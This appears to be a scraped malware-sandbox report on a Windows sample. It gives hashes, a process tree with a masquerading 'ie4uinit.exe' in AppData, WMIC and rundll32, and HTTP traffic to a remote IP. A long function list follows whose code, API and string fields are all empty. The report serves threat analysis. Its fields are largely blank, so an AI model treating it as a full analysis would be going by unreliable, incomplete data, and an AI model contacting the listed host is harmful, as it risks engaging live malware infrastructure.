MD5: | e1db05e6be33812c6289741472e9abe3 |
SHA1: | ca863c49be257e9ed0033a4c18bb3400c2396029 |
SHA256: | d6906cb7f9fb0f9cd12943509a1bb5e9409a4547a18f930b071d5c330e6c97f9 |
SHA512: | 7108e60a693bd5036cb40ff319acb405e6fd071285623664fde1892bd12652cc6259ed935b37b8b5b28648feeb3d7b7b95b9ebe3ab1f7e139acb43b077944b99 |
SSDEEP: | 48:8mpYVc726HQz71mUNK6EX51lr2djyct9rG228H19uZ61F4/sqo1X2QP2bFMg0mBW:8mpY3R+0cjonlIqtYEAzRc |
File Content Preview: | L..................F.... ...............................a...................A....P.O. .:i.....+00.../C:\...................b.1......S.r..........@........OwH.Sey...........................4........................).......Z.1......Sni............B........O |
Icon Hash: | 74f4e4e4e4e9e1ed |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Feb 1, 2022 19:53:15.892200947 CET | 49749 | 80 | 192.168.2.3 | 3.144.120.98 |
Feb 1, 2022 19:53:16.039894104 CET | 80 | 49749 | 3.144.120.98 | 192.168.2.3 |
Feb 1, 2022 19:53:16.040199041 CET | 49749 | 80 | 192.168.2.3 | 3.144.120.98 |
Feb 1, 2022 19:53:16.043211937 CET | 49749 | 80 | 192.168.2.3 | 3.144.120.98 |
Feb 1, 2022 19:53:16.190843105 CET | 80 | 49749 | 3.144.120.98 | 192.168.2.3 |
Feb 1, 2022 19:53:16.392364979 CET | 80 | 49749 | 3.144.120.98 | 192.168.2.3 |
Feb 1, 2022 19:53:16.392560959 CET | 49749 | 80 | 192.168.2.3 | 3.144.120.98 |
Feb 1, 2022 19:53:21.397562981 CET | 80 | 49749 | 3.144.120.98 | 192.168.2.3 |
Feb 1, 2022 19:53:21.397718906 CET | 49749 | 80 | 192.168.2.3 | 3.144.120.98 |
Feb 1, 2022 19:53:23.172271967 CET | 49749 | 80 | 192.168.2.3 | 3.144.120.98 |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Feb 1, 2022 19:53:15.813930035 CET | 53910 | 53 | 192.168.2.3 | 8.8.8.8 |
Feb 1, 2022 19:53:15.865458012 CET | 53 | 53910 | 8.8.8.8 | 192.168.2.3 |
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class |
---|---|---|---|---|---|---|---|
Feb 1, 2022 19:53:15.813930035 CET | 192.168.2.3 | 8.8.8.8 | 0x198d | Standard query (0) | A (IP address) | IN (0x0001) |
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class |
---|---|---|---|---|---|---|---|---|---|
Feb 1, 2022 19:53:15.865458012 CET | 8.8.8.8 | 192.168.2.3 | 0x198d | No error (0) | 3.144.120.98 | A (IP address) | IN (0x0001) |
|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
0 | 192.168.2.3 | 49749 | 3.144.120.98 | 80 | C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Feb 1, 2022 19:53:16.043211937 CET | 1123 | OUT | |
Feb 1, 2022 19:53:16.392364979 CET | 1123 | IN |
Click to jump to process
Click to jump to process
back
Click to dive into process behavior distribution
Click to jump to process
Target ID: | 1 |
Start time: | 19:53:09 |
Start date: | 01/02/2022 |
Path: | C:\Windows\System32\cmd.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff7b95c0000 |
File size: | 273920 bytes |
MD5 hash: | 4E2ACF4F8A396486AB4268C94A6A245F |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Target ID: | 3 |
Start time: | 19:53:10 |
Start date: | 01/02/2022 |
Path: | C:\Windows\System32\conhost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff7f20f0000 |
File size: | 625664 bytes |
MD5 hash: | EA777DEEA782E8B4D7C7C33BBF8A4496 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Target ID: | 4 |
Start time: | 19:53:11 |
Start date: | 01/02/2022 |
Path: | C:\Windows\System32\wbem\WMIC.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff6cb990000 |
File size: | 521728 bytes |
MD5 hash: | EC80E603E0090B3AC3C1234C2BA43A0F |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | moderate |
Target ID: | 6 |
Start time: | 19:53:12 |
Start date: | 01/02/2022 |
Path: | C:\Windows\System32\conhost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff7f20f0000 |
File size: | 625664 bytes |
MD5 hash: | EA777DEEA782E8B4D7C7C33BBF8A4496 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Target ID: | 7 |
Start time: | 19:53:13 |
Start date: | 01/02/2022 |
Path: | C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff6b5210000 |
File size: | 221184 bytes |
MD5 hash: | 9DD77F0F421AA9A70383210706ECA529 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Antivirus matches: |
|
Reputation: | moderate |
Target ID: | 8 |
Start time: | 19:53:14 |
Start date: | 01/02/2022 |
Path: | C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff6b5210000 |
File size: | 221184 bytes |
MD5 hash: | 9DD77F0F421AA9A70383210706ECA529 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | moderate |
Target ID: | 10 |
Start time: | 19:53:15 |
Start date: | 01/02/2022 |
Path: | C:\Windows\System32\rundll32.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff656990000 |
File size: | 69632 bytes |
MD5 hash: | 73C519F050C20580F8A62C849D49215A |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Target ID: | 11 |
Start time: | 19:53:16 |
Start date: | 01/02/2022 |
Path: | C:\Windows\System32\rundll32.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff656990000 |
File size: | 69632 bytes |
MD5 hash: | 73C519F050C20580F8A62C849D49215A |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Execution Graph
Execution Coverage: | 5.8% |
Dynamic/Decrypted Code Coverage: | 0% |
Signature Coverage: | 32.2% |
Total number of Nodes: | 516 |
Total number of Limit Nodes: | 11 |
Graph
Function 00007FF6B5211B44 Relevance: 91.3, APIs: 9, Strings: 43, Instructions: 275registryCOMMON
Control-flow Graph
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00007FF6B52120E4 Relevance: 63.2, APIs: 24, Strings: 12, Instructions: 228registrylibraryloaderCOMMON
Control-flow Graph
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00007FF6B5212DFC Relevance: 42.2, APIs: 19, Strings: 5, Instructions: 225commemorysynchronizationCOMMON
Control-flow Graph
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00007FF6B521B0DC Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 122COMMON
Control-flow Graph
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00007FF6B5212930 Relevance: 22.8, APIs: 7, Strings: 6, Instructions: 74processCOMMON
Control-flow Graph
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Control-flow Graph
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00007FF6B521B2C4 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 42libraryloaderCOMMON
Control-flow Graph
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00007FF6B5215974 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61windowtimethreadCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00007FF6B5233DA0 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00007FF6B521A854 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 248memoryCOMMON
Control-flow Graph
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00007FF6B52118B0 Relevance: 26.4, APIs: 9, Strings: 6, Instructions: 113libraryloaderCOMMON
Control-flow Graph
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00007FF6B52116CC Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 102registryCOMMON
Control-flow Graph
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00007FF6B5211A70 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 52registrymemorylibraryCOMMON
Control-flow Graph
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Control-flow Graph
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00007FF6B52157F0 Relevance: 16.6, APIs: 11, Instructions: 92filewindowCOMMON
Control-flow Graph
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Control-flow Graph
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00007FF6B521B35C Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 51libraryloaderCOMMON
Control-flow Graph
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00007FF6B521571C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52COMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00007FF6B5215AD8 Relevance: 4.5, APIs: 3, Instructions: 26synchronizationthreadwindowCOMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00007FF6B5215A5C Relevance: 3.0, APIs: 2, Instructions: 37windowthreadCOMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00007FF6B5230A8C Relevance: 89.4, APIs: 26, Strings: 25, Instructions: 196COMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00007FF6B5213D20 Relevance: 58.0, APIs: 26, Strings: 7, Instructions: 293fileregistrystringCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00007FF6B52126F0 Relevance: 40.4, APIs: 18, Strings: 5, Instructions: 130sleeplibraryloaderCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00007FF6B5219604 Relevance: 38.7, APIs: 18, Strings: 4, Instructions: 218synchronizationCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00007FF6B5226478 Relevance: 33.8, APIs: 14, Strings: 5, Instructions: 501COMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00007FF6B5226DD0 Relevance: 33.5, APIs: 15, Strings: 4, Instructions: 256memorynetworkfileCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00007FF6B5214F7C Relevance: 31.7, APIs: 14, Strings: 4, Instructions: 206filewindowCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00007FF6B522FDB4 Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 208librarynativeloaderCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00007FF6B5226BB4 Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 130networkCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00007FF6B522EFAC Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 94encryptionCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00007FF6B52153B8 Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 179registrywindowCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00007FF6B522F108 Relevance: 21.2, APIs: 14, Instructions: 164encryptionCOMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00007FF6B522EA9C Relevance: 16.6, APIs: 11, Instructions: 85encryptionCOMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00007FF6B5219A98 Relevance: 15.2, APIs: 8, Strings: 2, Instructions: 163memoryCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00007FF6B5227AC8 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 97encryptionCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00007FF6B521481C Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 70COMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00007FF6B522ED98 Relevance: 13.6, APIs: 9, Instructions: 145encryptionCOMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00007FF6B522E950 Relevance: 13.6, APIs: 9, Instructions: 92encryptionCOMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00007FF6B521C92C Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 212memorywindowCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00007FF6B522544C Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 106encryptionstringCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00007FF6B52273D0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 62encryptionCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00007FF6B52274BC Relevance: 12.1, APIs: 8, Instructions: 94encryptionCOMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00007FF6B522E80C Relevance: 10.6, APIs: 7, Instructions: 85encryptionCOMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00007FF6B52144E4 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 39fileCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00007FF6B522763C Relevance: 9.1, APIs: 6, Instructions: 80encryptionCOMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00007FF6B5222B50 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 132encryptionCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00007FF6B5227DCC Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 74encryptionCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00007FF6B522E750 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 50encryptionCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00007FF6B52256A4 Relevance: 6.1, APIs: 4, Instructions: 59encryptionCOMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00007FF6B522EBE0 Relevance: 6.0, APIs: 4, Instructions: 40encryptionCOMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00007FF6B522DBC4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 86nativeCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00007FF6B52225C0 Relevance: 3.1, APIs: 2, Instructions: 60encryptionCOMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00007FF6B5222550 Relevance: 1.5, APIs: 1, Instructions: 29encryptionCOMMONLIBRARYCODE
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00007FF6B52320C0 Relevance: .7, Instructions: 654COMMON
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00007FF6B5220C4C Relevance: .2, Instructions: 229COMMON
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00007FF6B5233330 Relevance: .1, Instructions: 124COMMON
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00007FF6B52331A8 Relevance: .1, Instructions: 101COMMON
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00007FF6B5215BBC Relevance: 42.2, APIs: 19, Strings: 5, Instructions: 158processfilesynchronizationCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00007FF6B5221B4C Relevance: 40.4, APIs: 1, Strings: 22, Instructions: 195COMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00007FF6B52260C0 Relevance: 37.0, APIs: 10, Strings: 11, Instructions: 259memoryCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00007FF6B5216040 Relevance: 33.5, APIs: 15, Strings: 4, Instructions: 227memorycomCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00007FF6B522F9DC Relevance: 33.4, APIs: 8, Strings: 11, Instructions: 123libraryloaderCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00007FF6B522F540 Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 123registryencryptionCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00007FF6B5230880 Relevance: 28.1, APIs: 10, Strings: 6, Instructions: 132memoryCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00007FF6B5215E58 Relevance: 28.1, APIs: 9, Strings: 7, Instructions: 105COMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00007FF6B5217268 Relevance: 26.4, APIs: 2, Strings: 13, Instructions: 151windowthreadCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00007FF6B5221464 Relevance: 24.7, APIs: 8, Strings: 6, Instructions: 194COMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00007FF6B5221154 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 135registrymemoryCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00007FF6B5219818 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 109memorysynchronizationCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00007FF6B521AE3C Relevance: 22.6, APIs: 15, Instructions: 126memoryCOMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00007FF6B521955C Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 113synchronizationCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00007FF6B521458C Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 89COMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00007FF6B522B5FC Relevance: 19.6, APIs: 13, Instructions: 87synchronizationCOMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00007FF6B5219DB0 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 163COMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00007FF6B5212C20 Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 76comlibraryloaderCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00007FF6B522797C Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 93encryptionCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00007FF6B5231084 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 68COMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00007FF6B522A810 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 60COMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00007FF6B5226FC8 Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 224memoryCOMMON
